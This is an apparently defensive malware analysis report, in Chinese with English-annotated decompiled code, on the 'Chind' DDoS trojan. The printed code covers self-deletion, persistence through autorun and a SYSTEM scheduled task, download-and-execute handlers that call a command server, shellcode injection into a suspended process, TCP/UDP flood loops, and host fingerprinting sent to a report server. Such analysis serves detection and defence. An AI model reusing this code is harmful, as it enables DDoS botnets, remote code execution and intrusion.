摘要
事件起因:
前一段时间国外网站曝出一个利用中国的受害者来执行DDOS的木马—Chind,在该木马准备攻击前,会先检测用户是否使用360,如果检测到就会停止攻击。这里就对该木马的行为进行详细报告。
木马危害:
该木马长期潜伏在用户电脑中,使用户电脑变成肉鸡,在适当时候(攻击时间由发起者决定)对指定目标进行DOS攻击。大量的肉鸡同时向一个目标发送大量数据,会导致被攻击目标网络瘫痪;而对于中招用户来说,一旦被攻击的网站对攻击事件进行追查,能查到的直接源头就是这些无辜的中招用户。
木马行为分析
0x01 使用upx压缩壳减小体积
从压缩前后可以看到体积减小了一半
0x02 创建互斥量,保证只有一个木马在运行
1.使用sleep函数使木马进入短暂休眠状态(该木马使用大量sleep函数,后面就不再提出了)
// Start-up: silence error dialogs, install a top-level exception filter, then sleep 10 s
// before doing anything else (possibly to outlast short automated analysis — confirm).
1: SetErrorMode(0x8003u); // SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX: no crash/error boxes
2: SetUnhandledExceptionFilter(TopLevelExceptionFilter);
3: Sleep(0x2710u); // 0x2710 = 10000 ms = 10 s
2.创建唯一标识"Global\\3672a9586a5f342b2ca070851e425db6"
1: hObject = CreateMutexW(0, 1, L"Global\\3672a9586a5f342b2ca070851e425db6"); // bInitialOwner = 1; this Global\ mutex name is a host-based indicator for the sample
3.互斥量创建是否成功
// A second instance sees ERROR_ALREADY_EXISTS on the named mutex: it deletes its own file and exits.
1: if ( hObject && GetLastError() == 183 ) // 183 = ERROR_ALREADY_EXISTS
2: {
3: DleteItSelf(); // self-delete via "cmd /c del" (listing below)
4: TopLevelExceptionFilter(v5); // presumably the exit path of 3.2 (TerminateProcess) — confirm
5: }
// Self-delete: builds "/c del <own 8.3 path> >> NUL" and launches it through %ComSpec% (cmd.exe).
// The delete succeeds because the process terminates right after (3.2), releasing the file lock.
// A cmd.exe child whose command line is "del <parent image>" is a useful detection signal.
1: if ( GetModuleFileNameW(0, &Filename, 0x104u) ) // 0x104 = MAX_PATH
2: {
3: if ( GetShortPathNameW(&Filename, &Filename, 0x104u) ) // 8.3 form, presumably to avoid quoting paths with spaces
4: {
5: lstrcpyW(&String1, L"/c del ");
6: lstrcatW(&String1, &Filename);
7: lstrcatW(&String1, L" >> NUL");
8: if ( GetEnvironmentVariableW(L"ComSpec", &Filename, 0x104u) ) // Filename is reused to hold cmd.exe's path
9: {
10: if ( (signed int)ShellExecuteW(0, 0, &Filename, &String1, 0, 0) > 32 ) // ShellExecute returns a value > 32 on success
11: result = 1;
12: }
13: }
3.2进程退出
// 3.2: hard exit of the current process (no atexit/destructor processing).
1:
2: v0 = GetCurrentProcess();
3: return TerminateProcess(v0, 0); // exit code 0
4.如果创建互斥量成功,根据当前进程具有的系统权限,选择路径进行自我复制
// Copies the running executable to the persistence location chosen by GetPath() (4.1).
// Returns CopyFileW's BOOL; bFailIfExists = 0, so an existing copy is overwritten.
1: BOOL sub_405DF0()
2: {
3: WCHAR *v0; // ST04_4@1
4: WCHAR *v1; // eax@1
5:
6: v0 = GetPath(); // destination: ...\wininit.exe (see 4.1)
7: v1 = GetModuleFileName(); // source: this executable's own path
8: return CopyFileW(v1, v0, 0); // 0 = overwrite if present
9: }
4.1获取复制自身所到的路径GetPath()
// GetPath() (4.1): chooses the drop location by privilege (judgegrade(), 4.1.1).
// Both paths and the "wininit.exe" name (mimicking the real Windows binary) are file indicators.
// Note: if SHGetFolderPathW fails there is no fallback, and FileName is returned as-is.
1: if ( judgegrade() ) // member of BUILTIN\Administrators
2: {
3: GetWindowsDirectoryW(&FileName, 0x104u); // %WINDIR%
4: PathAppendW(&FileName, L"\\System\\");
5: CreateDirectoryW(&FileName, 0);
6: PathAppendW(&FileName, L"\\Init\\");
7: CreateDirectoryW(&FileName, 0);
8: SetFileAttributesW(&FileName, 2u); // 2 = FILE_ATTRIBUTE_HIDDEN on the directory
9: PathAppendW(&FileName, L"\\wininit.exe"); // %WINDIR%\System\Init\wininit.exe
10: }
11: else if ( SHGetFolderPathW(0, 26, 0, 0, &FileName) >= 0 ) // 26 = CSIDL_APPDATA (%APPDATA%)
12: {
13: PathAppendW(&FileName, L"\\Microsoft\\");
14: CreateDirectoryW(&FileName, 0);
15: PathAppendW(&FileName, L"\\System\\");
16: CreateDirectoryW(&FileName, 0);
17: SetFileAttributesW(&FileName, 2u); // FILE_ATTRIBUTE_HIDDEN
18: PathAppendW(&FileName, L"\\wininit.exe"); // %APPDATA%\Microsoft\System\wininit.exe
19: }
4.1.1 判断系统的权限 JudgeGrade()
// JudgeGrade() (4.1.1): tests whether the current token is a member of BUILTIN\Administrators,
// the usual IsUserAnAdmin() pattern. With pIdentifierAuthority presumably SECURITY_NT_AUTHORITY
// the SID is S-1-5-32-544. Under UAC a non-elevated admin token fails this test, so the
// malware takes the unprivileged (%APPDATA% / schtasks) branch in that case.
1: if ( AllocateAndInitializeSid(&pIdentifierAuthority, 2u, 0x20u, 0x220u, 0, 0, 0, 0, 0, 0, &pSid) ) // 2 sub-authorities: 0x20 = SECURITY_BUILTIN_DOMAIN_RID, 0x220 = DOMAIN_ALIAS_RID_ADMINS
2: {
3: if ( !CheckTokenMembership(0, pSid, &IsMember) ) // 0 = current thread/process token
4: v3 = GetLastError();
5: }
6: else
7: {
8: v3 = GetLastError();
9: }
10: if ( pSid )
11: {
12: FreeSid(pSid);
13: pSid = 0;
14: }
15: if ( v3 ) // v3 is only assigned on failure above; its initial value is outside the excerpt
16: {
17: v1 = v3;
18: HandleExcpetion((int)&v1, (int)&unk_433B18); // error path; the IsMember result is returned beyond the excerpt
19: }
5.该木马通过对当前进程的权限的判断,选择一种方式使木马长期驻扎在内存中
5.1判断当前进程运行的权限是否是管理员权限(前面已经提到过,不在重复)
5.2如果是管理员权限,则直接写入注册表,开机自启动
5.3如果不是管理员权限,先判断系统版本
5.3.1如果系统版本是以下版本中的一个,则直接创建注册表,达到开机自启动就可以了(同5.2)
Windows Vista
Windows Server 2003 R2
Windows Home Server
Windows Server 2003
Windows XP Professional x64 Edition
Windows XP
Windows 2000
5.3.2如果系统版本不是以上中的一个,则调用schtasks.exe来创建服务,使木马不仅能够开机自启动,还能够以管理员权限运行
schtasks.exe命令行解析
/sc onstart 指定该服务是开机时便开始运行
/tn Microsoft\\Windows\\Shell\\Init 指定任务名为"Microsoft\\Windows\\Shell\\Init"
/tr \"\\\"%s\\\"\" 指定任务要执行的程序路径
/ru system 指定该任务具有system权限
// 5.3.2: persistence through a scheduled task. "schtasks /create /sc onstart /ru system" registers a
// task (not a service) that starts the dropped copy at boot as SYSTEM. The task name
// Microsoft\Windows\Shell\Init and a schtasks.exe child of an unsigned binary are detection indicators.
1: GetSystemDirectoryW(&Buffer, 0x104u);
2: wsprintfW(&File, L"%s\\schtasks.exe", &Buffer); // %WINDIR%\System32\schtasks.exe
3: if ( sub_406400() ) // unresolved helper; presumably the OS-version test of 5.3.1 — confirm
4: {
5: sub_406030(); // presumably the registry-autorun path of 5.2 — confirm
6: }
7: else
8: {
9: v0 = sub_404CB0(); // path of the dropped copy (by its use in /tr — confirm)
10: wsprintfW(
11: &Parameters,
12: L"/create /F /sc onstart /tn Microsoft\\Windows\\Shell\\Init /tr \"\\\"%s\\\"\" /ru system", // /F overwrites an existing task of that name
13: v0);
14: }
15: DeleteTask(); // remove a stale task with the same name first (listing below)
16: Sleep(0x2710u); // 10 s
17: return ShellExecuteW(0, L"open", &File, &Parameters, 0, 0); // NOTE: in the sub_406400() branch Parameters is never set in these lines, so schtasks runs with whatever Parameters held
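// DeleteTask(): unregisters the task Microsoft\Windows\Shell\Init before it is re-created.
// Fix: the listing read "eturn", which is not valid C.
1: wsprintfW(&Parameters, L"/delete /TN Microsoft\\Windows\\Shell\\Init /F", &Buffer); // &Buffer is passed but the format has no conversion, so it is unused
2: return ShellExecuteW(0, L"open", &File, &Parameters, 0, 0); // File = %WINDIR%\System32\schtasks.exe (set by the caller)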
0x06创建进程,删除自身
6.1运行刚刚复制的替身
6.2删除自身(同3.1)
0x07 测试网络是否畅通
如果不畅通,木马会开始不停地休眠,唤醒后继续尝试访问,到达一定次数后还没有网络时,木马会自动退出
// 0x07: connectivity gate. Re-probes every 2 min and gives up after 30 tries (~60 min offline).
1: while ( 1 )
2: {
3: v10 = TestInter(); // 7.1
4: if ( v10 )
5: break;
6: Sleep(0x1D4C0u); // 0x1D4C0 = 120000 ms = 2 min
7: ++v12;
8: if ( v12 >= 30 ) // 30 * 2 min = 60 min without network
9: ExitProcess(0);
10: }
7.1用到的测试网址都是常用网址
// TestInter() (7.1): up to 10 rounds of probing three high-traffic sites; the first reachable one returns 1.
// The return after the loop (presumably 0) is outside the excerpt. These GETs look like ordinary browsing,
// so on their own they are weak network indicators.
1: for ( i = 0; i < 10; ++i )
2: {
3: if ( SetInterConn("http://www.baidu.com/") ) // 7.1.1
4: return 1;
5: if ( SetInterConn("http://www.microsoft.com/") )
6: return 1;
7: if ( SetInterConn("http://www.qq.com/") )
8: return 1;
9: }
7.1.1连接设置 SetInterConn()
// SetInterConn() (7.1.1): a single WinINet GET of lpszUrl with 5 s timeouts and 5 connect retries.
// Returns 1 if InternetOpenUrlA succeeds, else 0; the response body is never read.
1: v3 = 0;
2: hInternet = InternetOpenA(&byte_4326BF, 1u, 0, 0, 0); // 1 = INTERNET_OPEN_TYPE_DIRECT; byte_4326BF = User-Agent string (not shown)
3: Buffer = 5000; // milliseconds
4: InternetSetOptionA(hInternet, 2u, &Buffer, 4u); //INTERNET_OPTION_CONNECT_TIMEOUT
5: InternetSetOptionA(hInternet, 5u, &Buffer, 4u); //INTERNET_OPTION_SEND_TIMEOUT
6: InternetSetOptionA(hInternet, 6u, &Buffer, 4u); //INTERNET_OPTION_RECEIVE_TIMEOUT
7: Buffer = 5;
8: InternetSetOptionA(hInternet, 3u, &Buffer, 4u); //INTERNET_OPTION_CONNECT_RETRIES
9: InternetSetOptionA(hInternet, 0x4Du, 0, 0); //INTERNET_OPTION_IGNORE_OFFLINE (0x4D = 77): ignore the system "work offline" state
10: v4 = InternetOpenUrlA(hInternet, lpszUrl, &byte_4326C3, 0, 0, (DWORD_PTR)&dwContext); // byte_4326C3 = extra request headers (not shown)
11: if ( v4 )
12: v3 = 1;
13: if ( v4 )
14: InternetCloseHandle(v4);
15: if ( hInternet )
16: InternetCloseHandle(hInternet);
17: return v3;
// Untitled listing (presumably 0x08): path of the local command/config file that 0x09 reads — confirm.
// Same privilege split as GetPath(): admin -> %WINDIR%\Logs\WMI\Event\SystemEvent.evt,
// otherwise %APPDATA%\Microsoft\System\wow64.dll. Both names mimic legitimate files; treat as file indicators.
1: if ( judgegrade() ) // 4.1.1
2: {
3: GetWindowsDirectoryW(&pszPath, 0x104u);
4: PathAppendW(&pszPath, L"\\Logs\\");
5: CreateDirectoryW(&pszPath, 0);
6: PathAppendW(&pszPath, L"\\WMI\\");
7: CreateDirectoryW(&pszPath, 0);
8: PathAppendW(&pszPath, L"\\Event\\");
9: CreateDirectoryW(&pszPath, 0);
10: SetFileAttributesW(&pszPath, 2u); // FILE_ATTRIBUTE_HIDDEN
11: PathAppendW(&pszPath, L"\\SystemEvent.evt");
12: }
13: else if ( SHGetFolderPathW(0, 26, 0, 0, &pszPath) >= 0 ) // 26 = CSIDL_APPDATA
14: {
15: PathAppendW(&pszPath, L"\\Microsoft\\");
16: CreateDirectoryW(&pszPath, 0);
17: PathAppendW(&pszPath, L"\\System\\");
18: CreateDirectoryW(&pszPath, 0);
19: SetFileAttributesW(&pszPath, 2u); // FILE_ATTRIBUTE_HIDDEN
20: PathAppendW(&pszPath, L"\\wow64.dll");
21: }
22: return &pszPath; // only valid if pszPath is static/global (returning a local's address would dangle) — confirm
0x09命令文件读取成功
9.1读取命令配置文件
1: ReadFile(hFile, lpBuffer, nNumberOfBytesToRead, &NumberOfBytesRead, 0); // neither the BOOL result nor NumberOfBytesRead is checked in the shown line
9.1解密命令配置文件
该木马采用Salsa20加密算法对命令配置文件进行了一次加密,从下面的反汇编代码就可以看出是Salsa20算法
// Tail of the Salsa20 block function: after the double-round loop, each of the 16 mixed 32-bit words is
// added to its input word and stored at output offsets 0,4,...,60 (one 64-byte block) by sub_40BBE0
// (presumably a 32-bit little-endian store helper — confirm). This "x[i] + j[i]" finalisation is the
// recognisable Salsa20 step; the quarter-round body is above the excerpt.
1: while ( v102 ); // end of the round loop
2: sub_40BBE0(a1, v6 + v101); // word 0; a1 = output buffer
3: sub_40BBE0(v70 + 4, v7 + v100);
4: sub_40BBE0(v71 + 8, v8 + v99);
5: sub_40BBE0(v72 + 12, v9 + v98);
6: sub_40BBE0(v73 + 16, v97 + v111);
7: sub_40BBE0(v74 + 20, v96 + v116);
8: sub_40BBE0(v75 + 24, v95 + v110);
9: sub_40BBE0(v76 + 28, v94 + v109);
10: sub_40BBE0(v77 + 32, v93 + v108);
11: sub_40BBE0(v78 + 36, v92 + v107);
12: sub_40BBE0(v79 + 40, v91 + v114);
13: sub_40BBE0(v80 + 44, v90 + v106);
14: sub_40BBE0(v81 + 48, v89 + v105);
15: sub_40BBE0(v82 + 52, v88 + v104);
16: sub_40BBE0(v83 + 56, v87 + v103);
17: sub_40BBE0(v84 + 60, v86 + v112); // word 15
18: return 0
9.2对接受到的命令进行相应的操作
该木马能接受的命令如下
update:存储当前的cnc到一个加密文件,并报告给服务器。然后,下载并执行最新版的木马,接着删除旧版木马。(篇幅有限,只列出部分)
// "update" handler (9.2): downloads a new build to %TEMP%\<tmp>.exe, starts it, then self-deletes.
// Detection: a temp file ending in ".exe" written by URLDownloadToFile and immediately executed.
1: GetTempPathA(0x104u, &Buffer);
2: GetTempFileNameA(&Buffer, &byte_4326CB, 0, &TempFileName); // byte_4326CB = 3-char prefix (not shown); uUnique = 0 creates the file
3: DeleteFileA(&TempFileName); // drop the placeholder so the name can be reused with ".exe"
4: v8 = (int)&v11; // v11 presumably aliases TempFileName — confirm
5: do
6: v9 = *(_BYTE *)(v8++ + 1);
7: while ( v9 ); // inline strlen: advance to the terminating NUL
8: v4 = v8;
9: *(_DWORD *)v8 = 1702389038; // 0x6578652E = ".exe" as little-endian bytes: appends ".exe"
10: *(_BYTE *)(v4 + 4) = 0;
11: DeleteUrlCacheEntryA(lpszUrlName); // purge the WinINet cache before and after so a stale copy is never used
12: URLDownloadToFileA(0, lpszUrlName, &TempFileName, 0, 0); // HRESULT unchecked
13: DeleteUrlCacheEntryA(lpszUrlName);
14: if ( sub_405800(&TempFileName, a3) ) // unresolved; presumably validates the download against a3 (a digest?) — confirm
15: {
16: memset(&StartupInfo, 0, 0x44u); // 0x44 = sizeof(STARTUPINFOA) on x86
17: StartupInfo.cb = 68;
18: ProcessInformation.hProcess = 0;
19: ProcessInformation.hThread = 0;
20: ProcessInformation.dwProcessId = 0;
21: ProcessInformation.dwThreadId = 0;
22: CloseHandle(hObject); // presumably the instance mutex, released so the new build passes the check in 0x02 — confirm
23: CreateProcessA(&TempFileName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation); // returned handles are never closed
24: DeleteItself(); // 3.1
25: TopLevelExceptionFilter(); // exit path (3.2)
26: }
27: result = DeleteFileA(&TempFileName); // reached only when the download was rejected (assuming the call above does not return)
url_exec:从指定的URL上下载文件,并使用WinExec来执行这个文件
// "url_exec" handler: same download-to-%TEMP%\<tmp>.exe sequence as "update", but the file is run with
// WinExec and this process keeps running. Result is WinExec's return when the download was accepted.
1: GetTempPathA(0x104u, &Buffer);
2: GetTempFileNameA(&Buffer, &PrefixString, 0, &TempFileName);
3: DeleteFileA(&TempFileName);
4: v4 = &v6; // v6 presumably aliases TempFileName — confirm
5: do
6: v2 = (v4++)[1];
7: while ( v2 ); // inline strlen
8: *(_DWORD *)v4 = 1702389038; // 0x6578652E = ".exe" (little-endian)
9: v4[4] = 0;
10: DeleteUrlCacheEntryA(lpszUrlName);
11: URLDownloadToFileA(0, lpszUrlName, &TempFileName, 0, 0); // HRESULT unchecked
12: DeleteUrlCacheEntryA(lpszUrlName);
13: result = sub_405800(&TempFileName, a2); // same unresolved validation helper as in "update" — confirm
14: if ( result )
15: result = WinExec(&TempFileName, 0); // 0 = SW_HIDE
shellcode_exec:创建一个挂起进程,并把shellcode注入到这个进程然后,恢复进程。
// "shellcode_exec" handler: spawns a suspended copy of itself, writes the decoded payload into it and
// points the primary thread's EIP at it. The chain CreateProcess(CREATE_SUSPENDED) -> VirtualAllocEx(RWX)
// -> WriteProcessMemory -> SetThreadContext -> ResumeThread is a well-known behavioural detection signature.
1: memset(&StartupInfo, 0, 0x44u); // 0x44 = sizeof(STARTUPINFOW) on x86
2: StartupInfo.cb = 68;
3: ProcessInformation.hProcess = 0;
4: ProcessInformation.hThread = 0;
5: ProcessInformation.dwProcessId = 0;
6: ProcessInformation.dwThreadId = 0;
7: GetModuleFileNameW(0, &Filename, 0x104u); // host process = this executable
8: result = CreateProcessW(&Filename, 0, 0, 0, 0, 4u, 0, 0, &StartupInfo, &ProcessInformation); // 4 = CREATE_SUSPENDED
9: if ( result )
10: {
11: memset(&Context, 0, 0x2CCu); // 0x2CC = sizeof(CONTEXT) on x86
12: Context.ContextFlags = 65537; // 0x10001 = CONTEXT_CONTROL (CONTEXT_i386 | 1): control registers incl. Eip
13: GetThreadContext(ProcessInformation.hThread, &Context);
14: lpBuffer = (LPCVOID)sub_407DF0(a1, &dwSize); // presumably decodes the payload carried in the command (a1) and returns its size — confirm
15: lpBaseAddress = VirtualAllocEx(ProcessInformation.hProcess, 0, dwSize, 0x3000u, 0x40u); // 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
16: WriteProcessMemory(ProcessInformation.hProcess, lpBaseAddress, lpBuffer, dwSize, 0); // results of 15/16 unchecked; a NULL lpBaseAddress would set Eip = 0
17: v3 = (void *)lpBuffer;
18: j_j__free((void *)lpBuffer);
19: Context.Eip = (DWORD)lpBaseAddress; // redirect the suspended main thread into the payload
20: SetThreadContext(ProcessInformation.hThread, &Context);
21: ResumeThread(ProcessInformation.hThread);
22: CloseHandle(ProcessInformation.hThread);
23: result = CloseHandle(ProcessInformation.hProcess); // the function's result becomes CloseHandle's BOOL
attack:利用生成的数据,通过TCP或UDP socket来攻击目标IP.
attack_reset:重置攻击目标的地址
cnc:指定cnc服务器的位置,木马会联系这个服务器来获取命令
cnc_reset:重置CNC服务器地址为默认值
report:指定报告服务器的地址
report_reset:重置报告服务器的地址为默认值
0x10木马利用TCP或者UDP创建socket()来对目标地址进行访问,实现DDOS攻击
10.1创建TCP连接
// 10.1 TCP flood loop: per iteration a new socket, a blocking connect, one send of a fixed buffer,
// half-close and close. No exit condition appears in the excerpt. From a defender's view this is
// many short-lived connections from one host to one IP, with a fixed or random port.
1: name.sa_family = 2; // AF_INET
2: *(_DWORD *)&name.sa_data[2] = inet_addr(cp); // sockaddr_in.sin_addr from the target string
3: if ( v10 && v11 )
4: *v11 = 58; // ':' — presumably cuts a "host:port" string at the separator — confirm
5: while ( 1 )
6: {
7: s = socket(2, 1, 6); // AF_INET, SOCK_STREAM, IPPROTO_TCP; INVALID_SOCKET is not checked
8: if ( v10 )
9: {
10: *(_WORD *)&name.sa_data[0] = htons(v10); // sin_port: fixed target port when one was given
11: }
12: else
13: {
14: v1 = HandleError(); // decompiler misname; by its use here and in 10.2 presumably a random-number source — confirm
15: *(_WORD *)&name.sa_data[0] = htons(v1); // otherwise a random destination port
16: }
17: connect(s, &name, 16); // 16 = sizeof(sockaddr_in); result unchecked
18: argp = 1;
19: ioctlsocket(s, -2147195266, &argp); // 0x8004667E = FIONBIO: non-blocking mode, set only after the blocking connect()
20: send(s, buf, len, 0); // buf/len are set outside the excerpt
21: shutdown(s, 1); // 1 = SD_SEND
22: closesocket(s);
10.2创建UDP连接
// 10.2 UDP flood loop: every datagram goes to a random port with a random length of 4096..8191 bytes;
// the 8 KiB payload buffer is refilled with one random byte every 10000 packets. No exit condition shown.
1: result = socket(2, 2, 17); // AF_INET, SOCK_DGRAM, IPPROTO_UDP
2: s = result;
3: if ( result >= 0 ) // NOTE: Winsock returns INVALID_SOCKET (~0) on failure; a signed >= 0 test as shown would not catch it — confirm the real type
4: {
5: *(_DWORD *)&to.sa_family = 0; // zero the sockaddr
6: *(_DWORD *)&to.sa_data[2] = 0;
7: *(_DWORD *)&to.sa_data[6] = 0;
8: *(_DWORD *)&to.sa_data[10] = 0;
9: to.sa_family = 2; // AF_INET
10: *(_DWORD *)&to.sa_data[2] = inet_addr(cp); // sin_addr
11: while ( 1 )
12: {
13: v9 = v10++ % 0x2710u; // 0x2710 = 10000 packets per refill
14: if ( !v9 )
15: {
16: v2 = HandleError(); // presumably random (see 10.1)
17: memset(&buf, v2, 0x2000u); // 8 KiB buffer filled with one byte value
18: }
19: v3 = HandleError();
20: *(_WORD *)&to.sa_data[0] = htons(v3); // random sin_port
21: len = HandleError() % 4096 + 4096; // 4096..8191 bytes, always within the 8 KiB buffer
22: sendto(s, &buf, len, 0, &to, 16); // result unchecked
0x11在创建DOS攻击线程后,该木马还会继续创建一个线程,到某个指定的网址去下载文件,然后对文件进行解密并执行获取到的命令
// 0x11 command-fetch thread: downloads the whole response in 4 KiB chunks into a growing heap buffer,
// decodes it (M_decode — presumably the Salsa20 step of 9.1 — confirm) and hands it to AcceptOrder().
// The szAgent/szHeaders values (not shown) are worth extracting as network indicators.
1: hInternet = InternetOpenA(&szAgent, 1u, 0, 0, 0); // 1 = INTERNET_OPEN_TYPE_DIRECT
2: Buffer = 5000; // ms
3: InternetSetOptionA(hInternet, 2u, &Buffer, 4u); // INTERNET_OPTION_CONNECT_TIMEOUT
4: InternetSetOptionA(hInternet, 5u, &Buffer, 4u); // INTERNET_OPTION_SEND_TIMEOUT
5: InternetSetOptionA(hInternet, 6u, &Buffer, 4u); // INTERNET_OPTION_RECEIVE_TIMEOUT
6: Buffer = 5;
7: InternetSetOptionA(hInternet, 3u, &Buffer, 4u); // INTERNET_OPTION_CONNECT_RETRIES
8: InternetSetOptionA(hInternet, 0x4Du, 0, 0); // INTERNET_OPTION_IGNORE_OFFLINE
9: DeleteUrlCacheEntryA(lpszUrlName);
10: hFile = InternetOpenUrlA(hInternet, lpszUrlName, &szHeaders, 0, 0x4040300u, (DWORD_PTR)&dwContext); // 0x4040300 = INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_UI | INTERNET_FLAG_PRAGMA_NOCACHE (verify against wininet.h)
11: if ( hFile )
12: {
13: v16 = 0; // bytes accumulated so far
14: v3 = About_Expection_badalloc_4(0); // allocator (named after its bad_alloc thunk): initial empty buffer
15: v14 = v3;
16: do
17: {
18: while ( !InternetReadFile(hFile, &v18, 0x1000u, &dwNumberOfBytesRead) ) // spins without sleeping on a read failure: a dead connection busy-loops here
19: ;
20: v9 = dwNumberOfBytesRead + v16;
21: v4 = About_Expection_badalloc_4(dwNumberOfBytesRead + v16); // grow by re-allocating and copying everything each chunk (quadratic, but bounded by response size)
22: v10 = v4;
23: memmove_0(v4, v14, v16);
24: v5 = v14;
25: j_j__free(v14);
26: memmove_0((char *)v10 + v16, &v18, dwNumberOfBytesRead); // append the 4 KiB chunk
27: v14 = v10;
28: v16 = v9;
29: }
30: while ( dwNumberOfBytesRead ); // 0 bytes read = end of response
31: v12 = M_decode(v14, v16); // v14 itself is not freed in the shown lines
32: if ( v12 )
33: {
34: v8 = AcceptOrder((int)v12, 0); // command dispatch (9.2)
35: v7 = v12;
36: j_j__free(v12);
37: }
0x12获取网卡信息
12.1通过调用 GetAdaptersInfo函数获取Adapter Name,Mac,Ip,NetMask,NetGate等信息
// 12.1: builds a host fingerprint "<n>_<addr>_<addr>..." from every adapter's hardware address into the
// global 4 KiB buffer unk_43F1C8. sub_41A958 behaves like sprintf (by its arguments — confirm).
1: GetAdaptersInfo(&AdapterInfo, &SizePointer); // return value unchecked: with a fixed-size AdapterInfo, ERROR_BUFFER_OVERFLOW leaves the struct unfilled
2: v3 = &AdapterInfo;
3: memset(&unk_43F1C8, 0, 0x1000u);
4: sub_41A958((int)&unk_43F1C8, "%d_", 32); // constant 32 as the first field
5: do
6: {
7: v4 = v3->Address; // assigned but unused below
8: sub_41A958(
9: (int)&unk_43F1C8,
10: "%s_%02x%02x%02x%02x%02x%02x%02x%02x", // destination buffer is also the "%s" source: overlapping sprintf operands are undefined behaviour
11: &unk_43F1C8,
12: v3->Address[0], // all 8 bytes of IP_ADAPTER_INFO.Address (MAX_ADAPTER_ADDRESS_LENGTH) are printed, not only the 6 of a MAC
13: v3->Address[1],
14: v3->Address[2],
15: v3->Address[3],
16: v3->Address[4],
17: v3->Address[5],
18: v3->Address[6],
19: v3->Address[7]);
20: v3 = v3->Next; // the loop condition (presumably v3 != NULL) is beyond the excerpt
21: }
12.2通过调用InternetOpenUrl()将刚刚获取到的本机信息发送至目标服务器
// 12.2: reports the fingerprint with one GET of a1 + a2 (report server + query, by the "%s%s" format).
// Same WinINet option set as 7.1.1; byte_4326C6/byte_4326C7 (User-Agent / headers, not shown) are indicators.
1: hInternet = InternetOpenA(&byte_4326C6, 1u, 0, 0, 0); // INTERNET_OPEN_TYPE_DIRECT
2: Buffer = 5000; // ms
3: InternetSetOptionA(hInternet, 2u, &Buffer, 4u); // INTERNET_OPTION_CONNECT_TIMEOUT
4: InternetSetOptionA(hInternet, 5u, &Buffer, 4u); // INTERNET_OPTION_SEND_TIMEOUT
5: InternetSetOptionA(hInternet, 6u, &Buffer, 4u); // INTERNET_OPTION_RECEIVE_TIMEOUT
6: Buffer = 5;
7: InternetSetOptionA(hInternet, 3u, &Buffer, 4u); // INTERNET_OPTION_CONNECT_RETRIES
8: InternetSetOptionA(hInternet, 0x4Du, 0, 0); // INTERNET_OPTION_IGNORE_OFFLINE
9: sub_41A958((int)&szUrlName, "%s%s", a1, a2); // sprintf-like; no length bound visible
10: DeleteUrlCacheEntryA(&szUrlName);
11: result = InternetOpenUrlA(hInternet, &szUrlName, &byte_4326C7, 0, 0, (DWORD_PTR)&dwContext);
12: v5 = result;
13: if ( result )
14: v4 = 1; // set but not returned in the shown lines
15: if ( v5 )
16: result = (HINTERNET)InternetCloseHandle(v5); // result is overwritten with CloseHandle's BOOL, so callers see the close status, not the request status
17: if ( hInternet )
18: result = (HINTERNET)InternetCloseHandle(hInternet);
现在这个网站已经不能访问,所以也返回不了数据了。
原文地址:http://www.cnblogs.com/kangxiaopao/p/4653630.html